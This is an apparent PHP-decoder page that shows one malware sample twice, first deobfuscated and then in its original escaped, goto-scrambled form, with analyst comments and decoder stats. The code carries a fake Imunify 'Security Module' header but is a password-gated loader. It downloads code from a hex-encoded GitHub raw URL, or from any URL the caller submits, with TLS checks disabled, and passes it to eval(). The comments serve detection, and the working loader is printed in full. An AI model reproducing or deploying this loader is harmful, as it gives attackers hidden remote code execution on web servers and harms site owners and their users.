PHP Decode
<?php // This file is part of Imunify - https://www.imunify.com/ // // Imunify is a com..
Decoded Output download
<?php
// This file is part of Imunify - https://www.imunify.com/
//
// Imunify is a comprehensive security solution designed to protect your systems from various
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security
// risks effectively. You are permitted to use this software in accordance with the terms and
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders.
//
// Imunify is distributed with the hope of providing optimal protection and security for your
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while
// Imunify strives to deliver robust security measures, no system can be entirely impervious to
// threats.
//
// You should have received a copy of the Imunify License Agreement along with this software.
// If not, please visit https://www.imunify.com/license for further information. This document
// is current as of October 8, 2024, and is subject to change based on updates in policies
// and security practices.
/**
* Security Module.
*
* This module is specifically designed to detect and mitigate various threats while ensuring
* the integrity of your systems through real-time scanning and comprehensive protection strategies.
* Imunify not only focuses on identifying vulnerabilities but also actively works to fortify
* your servers and applications against emerging cyber threats. By implementing proactive
* measures, Imunify aims to maintain a secure operating environment for all users.
*
* @package security_module
* @website https://rasenmedia.my.id
* @copyright 2024 Rahman Ralei
* @license https://www.imunify.com/license Imunify License Agreement
*/
// Entry point. The file is goto-scrambled: execution follows the labels, not the
// textual order. Order as traced from the gotos below:
//   altQy (session_start) -> xwkV1 (config array) -> SmWcT -> lLHk1 -> ioV4Q ->
//   b9K78 -> zIxtU (function chunks) -> G9a8M (login handler) ->
//   tKKGw (fetch + eval, or login form) -> QGXfM (end).
// NOTE(review): the header above presents this file as an Imunify "Security Module",
// but nothing below scans anything. The code is a password-gated loader that
// downloads content from a URL and passes it to eval().
goto altQy;
ioV4Q:
/**
* Password gate for the loader.
*
* Hashes the supplied value with md5() and compares it with the last element of
* the global $defaultThreatUrlParts array. On a match it sets two session values
* and returns true.
*
* @param mixed $ralei Value the caller takes from $_POST["logauth"].
* @return bool True when the hash matches, false otherwise.
*/
function authenticateUser($ralei)
{
// end() returns the final array element, which is the stored 32-hex-digit hash.
// The check is a single unsalted MD5; the literal hash in the array is a stable
// string to match on when hunting for copies of this sample.
if (md5($ralei) === end($GLOBALS["defaultThreatUrlParts"])) {
// Despite its name, "threat_found" is the session's "logged in" flag
// (isThreatDetected() reads it).
$_SESSION["threat_found"] = true;
// Fixed string that fetchThreatData() later sends as the Cookie header.
$_SESSION["antivirus_ralei"] = "rahmanralei_token";
return true;
}
return false;
}
goto b9K78;
G9a8M:
// Login handler: runs on any POST request that carries a "logauth" field.
// Request-body indicators for this sample: POST fields "logauth" and "scan_url".
if (isset($_POST["logauth"])) {
$inputauth = $_POST["logauth"];
if (authenticateUser($inputauth)) {
// After a correct password the caller may choose the URL that code is loaded from.
// The only check is FILTER_VALIDATE_URL (syntax), so there is no host allow-list;
// the value is stored in the session and reused by later requests.
if (isset($_POST["scan_url"]) && isValidScanUrl($_POST["scan_url"])) {
$_SESSION["scan_url"] = $_POST["scan_url"];
} else {
// Fallback: the hard-coded URL rebuilt from the hex-encoded config array.
$_SESSION["scan_url"] = reconstructUrl($defaultThreatUrlParts);
}
} else {
// Distinctive failure string emitted in the HTTP response.
echo "WRONG PASSWORD...";
}
}
goto tKKGw;
b9K78:
/**
* Syntax-only URL check.
*
* @param mixed $url Candidate URL (the caller passes $_POST["scan_url"]).
* @return bool True when filter_var() accepts the value as a URL.
*/
function isValidScanUrl($url)
{
// FILTER_VALIDATE_URL checks form only; it does not restrict host or destination.
return filter_var($url, FILTER_VALIDATE_URL) !== false;
}
goto zIxtU;
lLHk1:
/**
* Reports whether the current session has passed the password gate.
*
* The name suggests malware detection, but the function only reads the
* "threat_found" session flag that authenticateUser() sets.
*
* @return bool True when $_SESSION["threat_found"] is set and strictly true.
*/
function isThreatDetected()
{
return isset($_SESSION["threat_found"]) && $_SESSION["threat_found"] === true;
}
goto ioV4Q;
zIxtU:
/**
* Downloads the body of $url using whichever HTTP-capable function is available.
*
* Tries cURL first, then file_get_contents(), then fopen() with
* stream_get_contents(). The caller passes the result to eval().
*
* @param string $url Location to fetch (the caller passes $_SESSION["scan_url"]).
* @return string|false Response body, or false when no fetch method exists or the
*                      fetch function itself returns false.
*/
function fetchThreatData($url)
{
// The fallback chain lets the download survive a host where one of these
// functions is unavailable; egress filtering on the web server covers all three.
if (function_exists("curl_exec")) {
$connection = curl_init($url);
curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1);
// Redirects are followed, so the final source may differ from $url.
curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1);
// Hard-coded browser User-Agent (Firefox 32 on Windows NT 6.1); an outbound
// request from a server process carrying this string is a network indicator.
curl_setopt($connection, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
// Certificate and host-name verification are both switched off.
curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0);
// Sends the fixed session string set by authenticateUser() as the Cookie header.
if (isset($_SESSION["antivirus_ralei"])) {
curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["antivirus_ralei"]);
}
$dataFromUrl = curl_exec($connection);
curl_close($connection);
} elseif (function_exists("file_get_contents")) {
$dataFromUrl = file_get_contents($url);
} elseif (function_exists("fopen") && function_exists("stream_get_contents")) {
// No check that fopen() succeeded before the handle is read and closed.
$handle = fopen($url, "r");
$dataFromUrl = stream_get_contents($handle);
fclose($handle);
} else {
$dataFromUrl = false;
}
return $dataFromUrl;
}
goto G9a8M;
tKKGw:
// Main dispatch. The branch depends only on the session flag, so once a session has
// passed the password gate, every later request to this file (with that session
// cookie) repeats the download and eval without asking for the password again.
if (isThreatDetected()) {
$scanUrl = $_SESSION["scan_url"];
$content = fetchThreatData($scanUrl);
if ($content !== false) {
// Core of the sample: the downloaded body is executed in this process. The prepended
// PHP closing tag makes eval() parse the body like an included file, so it may mix
// HTML with PHP open tags. No payload is stored in this file; only the loader is.
eval("?>" . $content);
} else {
// On failure the response discloses the hard-coded default URL, not the session URL.
echo "Failed to fetch data from the URL.";
echo reconstructUrl($defaultThreatUrlParts);
}
// Unauthenticated sessions get a login form titled "Antivirus Login" with the
// fields "logauth" and "scan_url"; the title and field names are content indicators.
} else { ?>
<!doctypehtml>
<html>
<head>
<title>Antivirus Login</title>
</head>
<body align="center">
<form action="" method="POST"><label for="logauth">Password</label> <input id="logauth" name="logauth" type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url" name="scan_url" value=""><br><input type="submit" value="Submit"></form>
</body>
</html><?php }
goto QGXfM;
altQy:
// First statement actually executed (target of the opening goto). The session
// carries the login flag, the chosen URL and the cookie string between requests.
session_start();
goto xwkV1;
SmWcT:
/**
* Rebuilds the default download URL from the hex-encoded config array.
*
* @param array $parts Array of hex strings; the last element is skipped (it is the
*                     password hash, not part of the URL).
* @return string Elements 0 and 1 joined directly, then elements 2-5 each
*                preceded by "/".
*/
function reconstructUrl($parts)
{
// array_slice(..., 0, -1) drops the trailing hash; hex2bin() decodes the rest.
$decodedParts = array_map("hex2bin", array_slice($parts, 0, -1));
return $decodedParts[0] . $decodedParts[1] . "/" . $decodedParts[2] . "/" . $decodedParts[3] . "/" . $decodedParts[4] . "/" . $decodedParts[5];
}
goto lLHk1;
xwkV1:
// Config array. Elements 0-5 are hex-encoded pieces of the default download URL;
// they decode to "https://", "raw.githubusercontent[.]com" (defanged here),
// "Fajrul12345", "Fajrulirfan", "master" and "alfaa.txt".
// Element 6 is not hex-decoded: it is the MD5 that authenticateUser() compares
// against md5() of the submitted password.
// Hex-encoding keeps the URL out of plain-text searches of the file.
$defaultThreatUrlParts = array("68747470733a2f2f", "7261772e67697468756275736572636f6e74656e742e636f6d", "46616a72756c3132333435", "46616a72756c697266616e", "6d6173746572", "616c6661612e747874", "14cf3c7528a02c665ab65106dd9384e0");
goto SmWcT;
// Final label: target of the goto that follows the main dispatch; nothing runs after it.
QGXfM: ?>
Original Code
<?php
// This file is part of Imunify - https://www.imunify.com/
//
// Imunify is a comprehensive security solution designed to protect your systems from various
// threats, including malware, vulnerabilities, and unauthorized access. By leveraging advanced
// technology and intelligent algorithms, Imunify aims to detect, prevent, and mitigate security
// risks effectively. You are permitted to use this software in accordance with the terms and
// conditions outlined in the Imunify License Agreement, as specified by the copyright holders.
//
// Imunify is distributed with the hope of providing optimal protection and security for your
// environments, but it is offered WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Users should understand that while
// Imunify strives to deliver robust security measures, no system can be entirely impervious to
// threats.
//
// You should have received a copy of the Imunify License Agreement along with this software.
// If not, please visit https://www.imunify.com/license for further information. This document
// is current as of October 8, 2024, and is subject to change based on updates in policies
// and security practices.
/**
* Security Module.
*
* This module is specifically designed to detect and mitigate various threats while ensuring
* the integrity of your systems through real-time scanning and comprehensive protection strategies.
* Imunify not only focuses on identifying vulnerabilities but also actively works to fortify
* your servers and applications against emerging cyber threats. By implementing proactive
* measures, Imunify aims to maintain a secure operating environment for all users.
*
* @package security_module
* @website https://rasenmedia.my.id
* @copyright 2024 Rahman Ralei
* @license https://www.imunify.com/license Imunify License Agreement
*/
// Entry point of the obfuscated original. Two layers hide the logic: goto labels
// scramble the statement order, and string literals are written as mixed hex/octal
// escapes. Order as traced from the gotos: altQy -> xwkV1 -> SmWcT -> lLHk1 ->
// ioV4Q -> b9K78 -> zIxtU -> G9a8M -> tKKGw -> QGXfM.
// NOTE(review): the header above presents this file as an Imunify "Security Module",
// but the code is a password-gated loader that downloads content and eval()s it.
goto altQy;
ioV4Q:
/**
* Password gate for the loader (obfuscated form).
*
* Compares md5($ralei) with the last element of a global array and, on a match,
* sets two session values.
*
* @param mixed $ralei Value the caller takes from $_POST.
* @return bool True when the hash matches, false otherwise.
*/
function authenticateUser($ralei)
{
// The escaped $GLOBALS key decodes to "defaultThreatUrlParts" (per the Decoded
// Output listing on this page); end() picks its final element, the stored hash.
if (md5($ralei) === end($GLOBALS["\x64\x65\146\x61\165\154\x74\x54\150\x72\145\141\x74\x55\162\x6c\x50\x61\x72\164\163"])) {
// Key decodes to "threat_found": the session's "logged in" flag.
$_SESSION["\x74\150\x72\x65\141\164\137\146\157\165\156\x64"] = true;
// Key decodes to "antivirus_ralei", value to "rahmanralei_token".
$_SESSION["\x61\x6e\x74\151\166\151\162\165\x73\137\x72\141\x6c\x65\x69"] = "\162\141\150\x6d\x61\156\x72\x61\x6c\145\151\x5f\x74\x6f\x6b\x65\x6e";
return true;
}
return false;
}
goto b9K78;
G9a8M:
// Login handler. The escaped $_POST keys decode to "logauth" and "scan_url", and the
// $_SESSION key to "scan_url" (per the Decoded Output listing). The same key is
// escaped differently at each use, which defeats simple string matching on the file.
if (isset($_POST["\154\x6f\x67\141\165\164\150"])) {
$inputauth = $_POST["\154\x6f\x67\141\165\164\x68"];
if (authenticateUser($inputauth)) {
// A caller-supplied URL is accepted after a syntax-only check and kept in the session.
if (isset($_POST["\163\143\x61\156\x5f\x75\162\x6c"]) && isValidScanUrl($_POST["\x73\143\141\156\x5f\x75\162\154"])) {
$_SESSION["\x73\143\141\x6e\137\x75\x72\x6c"] = $_POST["\163\x63\x61\156\x5f\165\162\x6c"];
} else {
// Fallback: the hard-coded URL rebuilt from the config array.
$_SESSION["\163\x63\141\156\x5f\165\x72\154"] = reconstructUrl($defaultThreatUrlParts);
}
} else {
// Decodes to "WRONG PASSWORD...".
echo "\x57\x52\x4f\x4e\107\x20\120\x41\x53\123\127\x4f\122\104\56\x2e\56";
}
}
goto tKKGw;
b9K78:
/**
* Syntax-only URL check.
*
* @param mixed $url Candidate URL supplied by the caller.
* @return bool True when filter_var() accepts the value as a URL.
*/
function isValidScanUrl($url)
{
// FILTER_VALIDATE_URL checks form only; it does not restrict host or destination.
return filter_var($url, FILTER_VALIDATE_URL) !== false;
}
goto zIxtU;
lLHk1:
/**
* Reports whether the current session has passed the password gate.
*
* Both escaped session keys decode to "threat_found" (per the Decoded Output
* listing); no detection of any kind takes place here.
*
* @return bool True when the flag is set and strictly true.
*/
function isThreatDetected()
{
return isset($_SESSION["\x74\x68\x72\x65\141\164\x5f\146\157\165\x6e\144"]) && $_SESSION["\x74\x68\162\145\141\x74\137\146\x6f\x75\x6e\x64"] === true;
}
goto ioV4Q;
zIxtU:
/**
* Downloads the body of $url using whichever HTTP-capable function is available
* (obfuscated form).
*
* The escaped function names passed to function_exists() decode, per the Decoded
* Output listing, to "curl_exec", "file_get_contents", "fopen" and
* "stream_get_contents".
*
* @param string $url Location to fetch.
* @return string|false Response body, or false when no fetch method exists or the
*                      fetch function itself returns false.
*/
function fetchThreatData($url)
{
if (function_exists("\143\x75\162\x6c\137\x65\x78\x65\143")) {
$connection = curl_init($url);
curl_setopt($connection, CURLOPT_RETURNTRANSFER, 1);
// Redirects are followed, so the final source may differ from $url.
curl_setopt($connection, CURLOPT_FOLLOWLOCATION, 1);
// Decodes to a Firefox 32 / Windows NT 6.1 User-Agent string.
curl_setopt($connection, CURLOPT_USERAGENT, "\115\x6f\x7a\x69\154\154\141\57\65\x2e\60\x20\x28\127\x69\156\144\157\167\163\40\x4e\x54\40\x36\56\61\73\x20\162\166\72\63\62\x2e\60\51\x20\107\x65\x63\153\157\57\x32\x30\61\60\x30\61\60\x31\x20\106\x69\162\x65\x66\x6f\170\x2f\63\x32\56\x30");
// Certificate and host-name verification are both switched off.
curl_setopt($connection, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($connection, CURLOPT_SSL_VERIFYHOST, 0);
// Session key decodes to "antivirus_ralei"; its value is sent as the Cookie header.
if (isset($_SESSION["\141\x6e\164\151\x76\x69\162\165\x73\x5f\x72\x61\154\x65\x69"])) {
curl_setopt($connection, CURLOPT_COOKIE, $_SESSION["\141\156\164\x69\x76\151\x72\165\163\x5f\162\x61\x6c\x65\151"]);
}
$dataFromUrl = curl_exec($connection);
curl_close($connection);
} elseif (function_exists("\146\151\154\145\x5f\x67\145\164\x5f\143\x6f\x6e\x74\x65\x6e\x74\x73")) {
$dataFromUrl = file_get_contents($url);
} elseif (function_exists("\146\x6f\x70\145\156") && function_exists("\x73\x74\162\x65\x61\x6d\x5f\x67\145\164\x5f\143\157\156\x74\145\x6e\x74\x73")) {
// Mode string decodes to "r". No check that fopen() succeeded before use.
$handle = fopen($url, "\x72");
$dataFromUrl = stream_get_contents($handle);
fclose($handle);
} else {
$dataFromUrl = false;
}
return $dataFromUrl;
}
goto G9a8M;
tKKGw:
// Main dispatch. The branch depends only on the session flag, so an authenticated
// session repeats the download and eval on every request to this file.
if (isThreatDetected()) {
// Session key decodes to "scan_url" (per the Decoded Output listing).
$scanUrl = $_SESSION["\x73\143\141\156\137\165\x72\x6c"];
$content = fetchThreatData($scanUrl);
if ($content !== false) {
// Core of the sample: the downloaded body is executed in this process. The escaped
// prefix decodes to a PHP closing tag, so eval() parses the body like an included
// file. The page's stats report "Eval Count | 0", so the decoder did not unwrap any
// eval layer; a search for the literal eval( call still matches this line.
eval("\x3f\x3e" . $content);
} else {
// Decodes to "Failed to fetch data from the URL."; the default URL is echoed next.
echo "\106\141\x69\x6c\x65\x64\40\164\x6f\40\146\x65\164\x63\150\40\144\141\x74\x61\x20\146\162\157\155\x20\164\x68\145\40\125\122\x4c\x2e";
echo reconstructUrl($defaultThreatUrlParts);
}
// The login form below is left in plain text even in the obfuscated file, so its
// title and field names remain searchable content indicators.
} else { ?>
<!doctypehtml>
<html>
<head>
<title>Antivirus Login</title>
</head>
<body align="center">
<form action="" method="POST"><label for="logauth">Password</label> <input id="logauth" name="logauth" type="password"><br><label for="scan_url">Scan URL</label> <input id="scan_url" name="scan_url" value=""><br><input type="submit" value="Submit"></form>
</body>
</html><?php }
goto QGXfM;
altQy:
// First statement actually executed (target of the opening goto). The session
// carries the login flag, the chosen URL and the cookie string between requests.
session_start();
goto xwkV1;
SmWcT:
/**
* Rebuilds the default download URL from the encoded config array (obfuscated form).
*
* @param array $parts Array of hex strings; the last element is skipped.
* @return string Elements 0 and 1 joined directly, then elements 2-5 each
*                preceded by a slash.
*/
function reconstructUrl($parts)
{
// The escaped callback name decodes to "hex2bin" (per the Decoded Output listing);
// array_slice(..., 0, -1) drops the trailing password hash before decoding.
$decodedParts = array_map("\150\145\170\x32\142\x69\156", array_slice($parts, 0, -1));
// "\57" and "\x2f" are both "/", written two ways.
return $decodedParts[0] . $decodedParts[1] . "\57" . $decodedParts[2] . "\x2f" . $decodedParts[3] . "\57" . $decodedParts[4] . "\x2f" . $decodedParts[5];
}
goto lLHk1;
xwkV1:
// Config array, doubly encoded: each element is a string of hex digits that is itself
// written with PHP hex/octal escapes. The Decoded Output listing on this page shows
// the inner hex strings. Elements 0-5 are the pieces of the default download URL
// (decoded at run time by reconstructUrl); element 6 is the MD5
// 14cf3c7528a02c665ab65106dd9384e0 that the password check compares against.
// Because of the escape layer, neither the URL nor the hash appears as plain text
// in the file as stored on disk.
$defaultThreatUrlParts = array("\66\x38\x37\x34\67\64\x37\60\67\63\63\141\x32\x66\x32\x66", "\67\x32\x36\61\67\67\x32\145\66\67\66\x39\x37\x34\66\70\x37\65\66\x32\67\65\x37\x33\66\65\67\x32\x36\63\x36\146\x36\x65\67\64\66\65\66\145\67\x34\62\145\66\63\66\x66\66\x64", "\x34\x36\x36\61\66\141\67\x32\67\x35\66\x63\63\61\63\62\63\63\63\x34\63\65", "\x34\66\66\61\x36\x61\67\62\67\65\x36\143\66\71\x37\62\66\66\x36\x31\x36\x65", "\66\144\x36\61\67\63\x37\x34\66\65\x37\62", "\66\x31\x36\x63\x36\x36\x36\x31\x36\x31\62\145\x37\64\x37\70\x37\64", "\61\64\143\146\x33\x63\x37\65\62\70\x61\x30\62\x63\x36\66\65\141\142\66\65\61\x30\x36\x64\144\x39\x33\x38\x34\145\60");
goto SmWcT;
// Final label: target of the goto that follows the main dispatch; nothing runs after it.
QGXfM: ?>
Function Calls
None |
Stats
MD5 | 13a2f524a645c140592499f762897ee2 |
Eval Count | 0 |
Decode Time | 92 ms |